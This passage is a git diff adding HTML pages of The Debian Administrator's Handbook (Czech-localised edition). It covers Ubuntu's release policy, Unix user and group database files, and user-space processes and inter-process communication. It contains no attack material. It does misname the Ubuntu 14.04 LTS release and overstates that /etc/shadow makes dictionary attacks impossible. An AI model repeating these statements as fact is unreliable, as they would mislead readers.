+			So far, Ubuntu has managed to keep this release rhythm. They also publish <span
+            class="emphasis"><em>Long Term Support</em></span> (LTS) releases, with a 5-year maintenance promise. As of April 2015, the current LTS version is version 14.04, nicknamed Utopic Unicorn. The last non-LTS version is version 15.04, nicknamed Vivid Vervet. Version numbers describe the release date: 15.04, for example, was released in April 2015.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Ubuntu's support and maintenance promise</strong></p></div></div></div><a
+            id="id-1.20.5.7.2"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.3"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.4"
+            class="indexterm"></a><a
+            id="id-1.20.5.7.5"
+            class="indexterm"></a><div
+            class="para">
+			Canonical has adjusted multiple times the rules governing the length of the period during which a given release is maintained. Canonical, as a company, promises to provide security updates to all the software available in the <code
+              class="literal">main</code> and <code
+              class="literal">restricted</code> sections of the Ubuntu archive, for 5 years for LTS releases and for 9 months for non-LTS releases. Everything else (available in the <code
+              class="literal">universe</code> and <code
+              class="literal">multiverse</code>) is maintained on a best-effort basis by volunteers of the MOTU team (<span
+              class="emphasis"><em>Masters Of The Universe</em></span>). Be prepared to handle security support yourself if you rely on packages of the latter sections.
+		</div></div><div
+          class="para">
+			Ubuntu has reached a wide audience in the general public. Millions of users were impressed by its ease of installation, and the work that went into making the desktop simpler to use.
+		</div><div
+          class="para">
+			Ubuntu and Debian used to have a tense relationship; Debian developers who had placed great hopes in Ubuntu contributing directly to Debian were disappointed by the difference between the Canonical marketing, which implied Ubuntu were good citizens in the Free Software world, and the actual practice where they simply made public the changes they applied to Debian packages. Things have been getting better over the years, and Ubuntu has now made it general practice to forward patches to the most appropriate place (although this only applies to external software they package and not to the Ubuntu-specific software such as Mir or Unity). <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.ubuntu.com/">http://www.ubuntu.com/</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="derivative-distributions.html"><strong>Předcházející</strong>Příloha A. Derivative Distributions</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.linux-mint.html"><strong>Další</strong>A.3. Linux Mint</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html
new file mode 100644
index 000000000..e5b3f17ec
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-group-databases.html
@@ -0,0 +1,443 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.4. User and Group Databases</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.hostname-name-service.html"
+        title="8.3. Setting the Hostname and Configuring the Name Service" /><link
+        rel="next"
+        href="sect.creating-accounts.html"
+        title="8.5. Creating Accounts" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.user-group-databases.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hostname-name-service.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.creating-accounts.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.user-group-databases"></a>8.4. User and Group Databases</h2></div></div></div><a
+          id="id-1.11.8.2"
+          class="indexterm"></a><a
+          id="id-1.11.8.3"
+          class="indexterm"></a><a
+          id="id-1.11.8.4"
+          class="indexterm"></a><a
+          id="id-1.11.8.5"
+          class="indexterm"></a><div
+          class="para">
+			The list of users is usually stored in the <code
+            class="filename">/etc/passwd</code> file, while the <code
+            class="filename">/etc/shadow</code> file stores encrypted passwords. Both are text files, in a relatively simple format, which can be read and modified with a text editor. Each user is listed there on a line with several fields separated with a colon (“<code
+            class="literal">:</code>”).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Editing system files</strong></p></div></div></div><div
+            class="para">
+			The system files mentioned in this chapter are all plain text files, and can be edited with a text editor. Considering their importance to core system functionality, it is always a good idea to take extra precautions when editing system files. First, always make a copy or backup of a system file before opening or altering it. Second, on servers or machines where more than one person could potentially access the same file at the same time, take extra steps to guard against file corruption.
+		</div><div
+            class="para">
+			For this purpose, it is enough to use the <code
+              class="command">vipw</code> command to edit the <code
+              class="filename">/etc/passwd</code> file, or <code
+              class="command">vigr</code> to edit <code
+              class="filename">/etc/group</code>. These commands lock the file in question prior to running the text editor, (<code
+              class="command">vi</code> by default, unless the <code
+              class="varname">EDITOR</code> environment variable has been altered). The <code
+              class="literal">-s</code> option in these commands allows editing the corresponding <span
+              class="foreignphrase"><em
+                class="foreignphrase">shadow</em></span> file.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Crypt, a one-way function</strong></p></div></div></div><a
+            id="id-1.11.8.8.2"
+            class="indexterm"></a><div
+            class="para">
+			<code
+              class="command">crypt</code> is a one-way function that transforms a string (<code
+              class="varname">A</code>) into another string (<code
+              class="varname">B</code>) in a way that <code
+              class="varname">A</code> cannot be derived from <code
+              class="varname">B</code>. The only way to identify <code
+              class="varname">A</code> is to test all possible values, checking each one to determine if transformation by the function will produce <code
+              class="varname">B</code> or not. It uses up to 8 characters as input (string <code
+              class="varname">A</code>) and generates a string of 13, printable, ASCII characters (string <code
+              class="varname">B</code>).
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-passwd"></a>8.4.1. User List: <code
+                    class="filename">/etc/passwd</code></h3></div></div></div><div
+            class="para">
+				Here is the list of fields in the <code
+              class="filename">/etc/passwd</code> file:
+			</div><a
+            id="id-1.11.8.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.4"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.5"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.6"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.7"
+            class="indexterm"></a><a
+            id="id-1.11.8.9.8"
+            class="indexterm"></a><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						login, for example <code
+                    class="literal">rhertzog</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						password: this is a password encrypted by a one-way function (<code
+                    class="command">crypt</code>), relying on <code
+                    class="literal">DES</code>, <code
+                    class="literal">MD5</code>, <code
+                    class="literal">SHA-256</code> or <code
+                    class="literal">SHA-512</code>. The special value “<code
+                    class="literal">x</code>” indicates that the encrypted password is stored in <code
+                    class="filename">/etc/shadow</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">uid</code>: unique number identifying each user;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">gid</code>: unique number for the user's main group (Debian creates a specific group for each user by default);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">GECOS</code>: data field usually containing the user's full name;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						login directory, assigned to the user for storage of their personal files (the environment variable <code
+                    class="varname">$HOME</code> generally points here);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						program to execute upon login. This is usually a command interpreter (shell), giving the user free rein. If you specify <code
+                    class="command">/bin/false</code> (which does nothing and returns control immediately), the user cannot login.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Unix group</strong></p></div></div></div><a
+              id="id-1.11.8.9.10.2"
+              class="indexterm"></a><div
+              class="para">
+				A Unix group is an entity including several users so that they can easily share files using the integrated permission system (by benefiting from the same rights). You can also restrict use of certain programs to a specific group.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-shadow"></a>8.4.2. The Hidden and Encrypted Password File: <code
+                    class="filename">/etc/shadow</code></h3></div></div></div><a
+            id="id-1.11.8.10.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.10.3"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="filename">/etc/shadow</code> file contains the following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						login;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						encrypted password;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						several fields managing password expiration.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DOCUMENTATION</em></span> <code
+                        class="filename">/etc/passwd</code>, <code
+                        class="filename">/etc/shadow</code> and <code
+                        class="filename">/etc/group</code> file formats</strong></p></div></div></div><div
+              class="para">
+				These formats are documented in the following man pages: <span
+                class="citerefentry"><span
+                  class="refentrytitle">passwd</span>(5)</span>, <span
+                class="citerefentry"><span
+                  class="refentrytitle">shadow</span>(5)</span>, and <span
+                class="citerefentry"><span
+                  class="refentrytitle">group</span>(5)</span>.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>SECURITY</em></span> <code
+                        class="filename">/etc/shadow</code> file security</strong></p></div></div></div><div
+              class="para">
+				<code
+                class="filename">/etc/shadow</code>, unlike its alter-ego, <code
+                class="filename">/etc/passwd</code>, cannot be read by regular users. Any encrypted password stored in <code
+                class="filename">/etc/passwd</code> is readable by anybody; a cracker could try to “break” (or reveal) a password by one of several “brute force” methods which, simply put, guess at commonly used combinations of characters. This attack — called a "dictionary attack" — is no longer possible on systems using <code
+                class="filename">/etc/shadow</code>.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.account-modification"></a>8.4.3. Modifying an Existing Account or Password</h3></div></div></div><a
+            id="id-1.11.8.11.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.3"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.4"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.5"
+            class="indexterm"></a><a
+            id="id-1.11.8.11.6"
+            class="indexterm"></a><div
+            class="para">
+				The following commands allow modification of the information stored in specific fields of the user databases: <code
+              class="command">passwd</code> permits a regular user to change their password, which in turn, updates the <code
+              class="filename">/etc/shadow</code> file; <code
+              class="command">chfn</code> (CHange Full Name), reserved for the super-user (root), modifies the <code
+              class="literal">GECOS</code> field. <code
+              class="command">chsh</code> (CHange SHell) allows the user to change their login shell, however available choices will be limited to those listed in <code
+              class="filename">/etc/shells</code>; the administrator, on the other hand, is not bound by this restriction and can set the shell to any program of their choosing.
+			</div><div
+            class="para">
+				Finally, the <code
+              class="command">chage</code> (CHange AGE) command allows the administrator to change the password expiration settings (the <code
+              class="literal">-l <em
+                class="replaceable">user</em></code> option will list the current settings). You can also force the expiration of a password using the <code
+              class="command">passwd -e <em
+                class="replaceable">user</em></code> command, which will require the user to change their password the next time they log in.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.disabling-account"></a>8.4.4. Disabling an Account</h3></div></div></div><a
+            id="id-1.11.8.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.8.12.3"
+            class="indexterm"></a><div
+            class="para">
+				You may find yourself needing to “disable an account” (lock out a user), as a disciplinary measure, for the purposes of an investigation, or simply in the event of a prolonged or definitive absence of a user. A disabled account means the user cannot login or gain access to the machine. The account remains intact on the machine and no files or data are deleted; it is simply inaccessible. This is accomplished by using the command <code
+              class="command">passwd -l <em
+                class="replaceable">user</em></code> (lock). Re-enabling the account is done in similar fashion, with the <code
+              class="literal">-u</code> option (unlock).
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.intro-nss"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> NSS and system databases</strong></p></div></div></div><a
+              id="id-1.11.8.12.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.8.12.5.3"
+              class="indexterm"></a><div
+              class="para">
+				Instead of using the usual files to manage lists of users and groups, you could use other types of databases, such as LDAP or <code
+                class="command">db</code>, by using an appropriate NSS (Name Service Switch) module. The modules used are listed in the <code
+                class="filename">/etc/nsswitch.conf</code> file, under the <code
+                class="literal">passwd</code>, <code
+                class="literal">shadow</code> and <code
+                class="literal">group</code> entries. See <a
+                class="xref"
+                href="sect.ldap-directory.html#sect.config-nss">11.7.3.1 – „Configuring NSS“</a> for a specific example of the use of an NSS module by LDAP.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.etc-group"></a>8.4.5. Group List: <code
+                    class="filename">/etc/group</code></h3></div></div></div><div
+            class="para">
+				Groups are listed in the <code
+              class="filename">/etc/group</code> file, a simple textual database in a format similar to that of the <code
+              class="filename">/etc/passwd</code> file, with the following fields:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						group name;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						password (optional): This is only used to join a group when one is not a usual member (with the <code
+                    class="command">newgrp</code> or <code
+                    class="command">sg</code> commands, see sidebar <a
+                    class="xref"
+                    href="sect.user-group-databases.html#sidebar.working-with-several-groups"><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Working with several groups</a>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">gid</code>: unique group identification number;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						list of members: list of names of users who are members of the group, separated by commas.
+					</div></li></ul></div><div
+            class="para">
+			</div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.working-with-several-groups"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Working with several groups</strong></p></div></div></div><a
+              id="id-1.11.8.13.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.3"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.4"
+              class="indexterm"></a><a
+              id="id-1.11.8.13.5.5"
+              class="indexterm"></a><div
+              class="para">
+				Each user may be a member of many groups; one of them is their “main group”. A user's main group is, by default, created during initial user configuration. By default, each file that a user creates belongs to them, as well as to their main group. This is not always desirable; for example, when the user needs to work in a directory shared by a group other than their main group. In this case, the user needs to change their main group using one of the following commands: <code
+                class="command">newgrp</code>, which starts a new shell, or <code
+                class="command">sg</code>, which simply executes a command using the supplied alternate group. These commands also allow the user to join a group to which they do not belong. If the group is password protected, they will need to supply the appropriate password before the command is executed.
+			</div><div
+              class="para">
+				Alternatively, the user can set the <code
+                class="literal">setgid</code> bit on the directory, which causes files created in that directory to automatically belong to the correct group. For more details, see sidebar <a
+                class="xref"
+                href="sect.rights-management.html#sidebar.setgid-dir"><span
+                  class="emphasis"><em>SECURITY</em></span> <code
+                  class="literal">setgid</code> directory and <span
+                  class="emphasis"><em>sticky bit</em></span></a>.
+			</div><div
+              class="para">
+				The <code
+                class="command">id</code> command displays the current state of a user, with their personal identifier (<code
+                class="varname">uid</code> variable), current main group (<code
+                class="varname">gid</code> variable), and the list of groups to which they belong (<code
+                class="varname">groups</code> variable).
+			</div></div><a
+            id="id-1.11.8.13.6"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.7"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">addgroup</code> and <code
+              class="command">delgroup</code> commands add or delete a group, respectively. The <code
+              class="command">groupmod</code> command modifies a group's information (its <code
+              class="literal">gid</code> or identifier). The command <code
+              class="command">gpasswd <em
+                class="replaceable">group</em></code> changes the password for the group, while the <code
+              class="command">gpasswd -r <em
+                class="replaceable">group</em></code> command deletes it.
+			</div><a
+            id="id-1.11.8.13.9"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.10"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.11"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.12"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.13"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.14"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.15"
+            class="indexterm"></a><a
+            id="id-1.11.8.13.16"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> <code
+                        class="command">getent</code></strong></p></div></div></div><a
+              id="id-1.11.8.13.17.2"
+              class="indexterm"></a><div
+              class="para">
+				The <code
+                class="command">getent</code> (get entries) command checks the system databases the standard way, using the appropriate library functions, which in turn call the NSS modules configured in the <code
+                class="filename">/etc/nsswitch.conf</code> file. The command takes one or two arguments: the name of the database to check, and a possible search key. Thus, the command <code
+                class="command">getent passwd rhertzog</code> will give the information from the user database regarding the user <code
+                class="literal">rhertzog</code>.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.hostname-name-service.html"><strong>Předcházející</strong>8.3. Setting the Hostname and Configuring the Nam...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.creating-accounts.html"><strong>Další</strong>8.5. Creating Accounts</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html
new file mode 100644
index 000000000..e0abb1fc2
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.user-space.html
@@ -0,0 +1,262 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.5. The User Space</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.kernel-role-and-tasks.html"
+        title="B.4. Some Tasks Handled by the Kernel" /><link
+        rel="next"
+        href="backcover.html"
+        title="Příloha C. The Debian Administrator's Handbook" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.user-space.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-role-and-tasks.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="backcover.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.user-space"></a>B.5. The User Space</h2></div></div></div><a
+          id="id-1.21.8.2"
+          class="indexterm"></a><a
+          id="id-1.21.8.3"
+          class="indexterm"></a><div
+          class="para">
+			“User space” refers to the runtime environment of normal (as opposed to kernel) processes. This does not necessarily mean these processes are actually started by users because a standard system normally has several “daemon” (or background) processes running before the user even opens a session. Daemon processes are also considered user-space processes.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.process-basics"></a>B.5.1. Process</h3></div></div></div><a
+            id="id-1.21.8.5.2"
+            class="indexterm"></a><div
+            class="para">
+				When the kernel gets past its initialization phase, it starts the very first process, <code
+              class="command">init</code>. Process #1 alone is very rarely useful by itself, and Unix-like systems run with many additional processes.
+			</div><a
+            id="id-1.21.8.5.4"
+            class="indexterm"></a><div
+            class="para">
+				First of all, a process can clone itself (this is known as a <span
+              class="emphasis"><em>fork</em></span>). The kernel allocates a new (but identical) process memory space, and another process to use it. At this time, the only difference between these two processes is their <span
+              class="emphasis"><em>pid</em></span>. The new process is usually called a child process, and the original process whose <span
+              class="emphasis"><em>pid</em></span> doesn't change, is called the parent process.
+			</div><div
+            class="para">
+				Sometimes, the child process continues to lead its own life independently from its parent, with its own data copied from the parent process. In many cases, though, this child process executes another program. With a few exceptions, its memory is simply replaced by that of the new program, and execution of this new program begins. This is the mechanism used by the init process (with process number 1) to start additional services and execute the whole startup sequence. At some point, one process among <code
+              class="command">init</code>'s offspring starts a graphical interface for users to log in to (the actual sequence of events is described in more details in <a
+              class="xref"
+              href="unix-services.html#sect.system-boot">9.1 – „System Boot“</a>).
+			</div><div
+            class="para">
+				When a process finishes the task for which it was started, it terminates. The kernel then recovers the memory assigned to this process, and stops giving it slices of running time. The parent process is told about its child process being terminated, which allows a process to wait for the completion of a task it delegated to a child process. This behavior is plainly visible in command-line interpreters (known as <span
+              class="emphasis"><em>shells</em></span>). When a command is typed into a shell, the prompt only comes back when the execution of the command is over. Most shells allow for running the command in the background, it is a simple matter of adding an <strong
+              class="userinput"><code>&amp;</code></strong> to the end of the command. The prompt is displayed again right away, which can lead to problems if the command needs to display data of its own.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.daemons"></a>B.5.2. Daemons</h3></div></div></div><a
+            id="id-1.21.8.6.2"
+            class="indexterm"></a><a
+            id="id-1.21.8.6.3"
+            class="indexterm"></a><div
+            class="para">
+				A “daemon” is a process started automatically by the boot sequence. It keeps running (in the background) to perform maintenance tasks or provide services to other processes. This “background task” is actually arbitrary, and does not match anything particular from the system's point of view. They are simply processes, quite similar to other processes, which run in turn when their time slice comes. The distinction is only in the human language: a process that runs with no interaction with a user (in particular, without any graphical interface) is said to be running “in the background” or “as a daemon”.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>VOCABULARY</em></span> Daemon, demon, a derogatory term?</strong></p></div></div></div><div
+              class="para">
+				Although <span
+                class="emphasis"><em>daemon</em></span> term shares its Greek etymology with <span
+                class="emphasis"><em>demon</em></span>, the former does not imply diabolical evil, instead, it should be understood as a kind of helper spirit. This distinction is subtle enough in English; it is even worse in other languages where the same word is used for both meanings.
+			</div></div><div
+            class="para">
+				Several such daemons are described in detail in <a
+              class="xref"
+              href="unix-services.html">9 – „<em>Unix Services</em>“</a>.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipc"></a>B.5.3. Inter-Process Communications</h3></div></div></div><a
+            id="id-1.21.8.7.2"
+            class="indexterm"></a><a
+            id="id-1.21.8.7.3"
+            class="indexterm"></a><div
+            class="para">
+				An isolated process, whether a daemon or an interactive application, is rarely useful on its own, which is why there are several methods allowing separate processes to communicate together, either to exchange data or to control one another. The generic term referring to this is <span
+              class="emphasis"><em>inter-process communication</em></span>, or IPC for short.
+			</div><div
+            class="para">
+				The simplest IPC system is to use files. The process that wishes to send data writes it into a file (with a name known in advance), while the recipient only has to open the file and read its contents.
+			</div><a
+            id="id-1.21.8.7.6"
+            class="indexterm"></a><div
+            class="para">
+				In the case where you do not wish to store data on disk, you can use a <span
+              class="emphasis"><em>pipe</em></span>, which is simply an object with two ends; bytes written in one end are readable at the other. If the ends are controlled by separate processes, this leads to a simple and convenient inter-process communication channel. Pipes can be classified into two categories: named pipes, and anonymous pipes. A named pipe is represented by an entry on the filesystem (although the transmitted data is not stored there), so both processes can open it independently if the location of the named pipe is known beforehand. In cases where the communicating processes are related (for instance, a parent and its child process), the parent process can also create an anonymous pipe before forking, and the child inherits it. Both processes will then be able to exchange data through the pipe without needing the filesystem.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> A concrete example</strong></p></div></div></div><div
+              class="para">
+				Let's describe in some detail what happens when a complex command (a <span
+                class="emphasis"><em>pipeline</em></span>) is run from a shell. We assume we have a <code
+                class="command">bash</code> process (the standard user shell on Debian), with <span
+                class="emphasis"><em>pid</em></span> 4374; into this shell, we type the command: <code
+                class="command">ls | sort</code> .
+			</div><div
+              class="para">
+				The shell first interprets the command typed in. In our case, it understands there are two programs (<code
+                class="command">ls</code> and <code
+                class="command">sort</code>), with a data stream flowing from one to the other (denoted by the <strong
+                class="userinput"><code>|</code></strong> character, known as <span
+                class="emphasis"><em>pipe</em></span>). <code
+                class="command">bash</code> first creates an unnamed pipe (which initially exists only within the <code
+                class="command">bash</code> process itself).
+			</div><div
+              class="para">
+				Then the shell clones itself; this leads to a new <code
+                class="command">bash</code> process, with <span
+                class="emphasis"><em>pid</em></span> #4521 (<span
+                class="emphasis"><em>pids</em></span> are abstract numbers, and generally have no particular meaning). Process #4521 inherits the pipe, which means it is able to write in its “input” side; <code
+                class="command">bash</code> redirects its standard output stream to this pipe's input. Then it executes (and replaces itself with) the <code
+                class="command">ls</code> program, which lists the contents of the current directory. Since <code
+                class="command">ls</code> writes on its standard output, and this output has previously been redirected, the results are effectively sent into the pipe.
+			</div><div
+              class="para">
+				A similar operation happens for the second command: <code
+                class="command">bash</code> clones itself again, leading to a new <code
+                class="command">bash</code> process with pid #4522. Since it is also a child process of #4374, it also inherits the pipe; <code
+                class="command">bash</code> then connects its standard input to the pipe output, then executes (and replaces itself with) the <code
+                class="command">sort</code> command, which sorts its input and displays the results.
+			</div><div
+              class="para">
+				All the pieces of the puzzle are now set up: <code
+                class="command">ls</code> reads the current directory and writes the list of files into the pipe; <code
+                class="command">sort</code> reads this list, sorts it alphabetically, and displays the results. Processes numbers #4521 and #4522 then terminate, and #4374 (which was waiting for them during the operation), resumes control and displays the prompt to allow the user to type in a new command.
+			</div></div><div
+            class="para">
+				Not all inter-process communications are used to move data around, though. In many situations, the only information that needs to be transmitted are control messages such as “pause execution” or “resume execution”. Unix (and Linux) provides a mechanism known as <span
+              class="emphasis"><em>signals</em></span>, through which a process can simply send a specific signal (chosen from a predefined list of signals) to another process. The only requirement is to know the <span
+              class="emphasis"><em>pid</em></span> of the target.
+			</div><div
+            class="para">
+				For more complex communications, there are also mechanisms allowing a process to open access, or share, part of its allocated memory to other processes. Memory now shared between them can be used to move data between the processes.
+			</div><div
+            class="para">
+				Finally, network connections can also help processes communicate; these processes can even be running on different computers, possibly thousands of kilometers apart.
+			</div><div
+            class="para">
+				It is quite standard for a typical Unix-like system to make use of all these mechanisms to various degrees.
